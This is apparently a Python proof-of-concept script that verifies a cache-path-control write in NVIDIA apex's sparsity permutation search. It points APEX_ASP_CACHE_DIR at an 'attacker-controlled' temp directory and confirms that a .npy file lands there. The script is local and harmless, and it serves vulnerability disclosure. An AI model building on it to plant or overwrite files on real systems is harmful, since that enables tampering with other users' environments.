
"""PoC 01: apex cache path control write.

This is a local, benign verification script.
Expected result: a .npy file appears in the attacker-controlled cache dir.
"""

import os
import sys
import tempfile
import types
import importlib.util
from pathlib import Path


def _load_module(module_name: str, file_path: Path):
    spec = importlib.util.spec_from_file_location(module_name, str(file_path))
    if spec is None or spec.loader is None:
        raise RuntimeError(f"cannot build module spec for {file_path}")
    module = importlib.util.module_from_spec(spec)
    sys.modules[module_name] = module
    spec.loader.exec_module(module)
    return module


def _load_exhaustive_search_without_apex_init(repo_apex: Path):
    # Create lightweight package shells so relative imports resolve without executing apex/__init__.py.
    pkg_roots = {
        "apex": repo_apex / "apex",
        "apex.contrib": repo_apex / "apex" / "contrib",
        "apex.contrib.sparsity": repo_apex / "apex" / "contrib" / "sparsity",
        "apex.contrib.sparsity.permutation_search_kernels": repo_apex
        / "apex"
        / "contrib"
        / "sparsity"
        / "permutation_search_kernels",
    }
    for name, root in pkg_roots.items():
        if name not in sys.modules:
            pkg = types.ModuleType(name)
            pkg.__path__ = [str(root)]
            sys.modules[name] = pkg

    kernels_dir = pkg_roots["apex.contrib.sparsity.permutation_search_kernels"]
    _load_module(
        "apex.contrib.sparsity.permutation_search_kernels.permutation_utilities",
        kernels_dir / "permutation_utilities.py",
    )
    return _load_module(
        "apex.contrib.sparsity.permutation_search_kernels.exhaustive_search",
        kernels_dir / "exhaustive_search.py",
    )


def main() -> int:
    repo_apex = Path("apex")
    if not repo_apex.exists():
        print(f"[!] apex repo not found: {repo_apex}")
        return 1

    try:
        exhaustive_search = _load_exhaustive_search_without_apex_init(repo_apex)
        generate_all_unique_combinations = exhaustive_search.generate_all_unique_combinations
    except Exception as exc:
        print(f"[!] import failed: {exc}")
        print("[i] this PoC avoids apex top-level import; install minimal deps (typically numpy).")
        return 1

    temp_root = Path(tempfile.mkdtemp(prefix="poc01_"))
    controlled = temp_root / "attacker_controlled_cache"
    os.environ["APEX_ASP_CACHE_DIR"] = str(controlled)

    print(f"[*] APEX_ASP_CACHE_DIR={controlled}")
    generate_all_unique_combinations(4, 4)

    expected = controlled / "permutations_4_4.npy"
    if expected.exists():
        print(f"[+] success: controlled write observed: {expected}")
        return 0

    print(f"[-] failed: expected file not found: {expected}")
    return 2


if __name__ == "__main__":
    raise SystemExit(main())
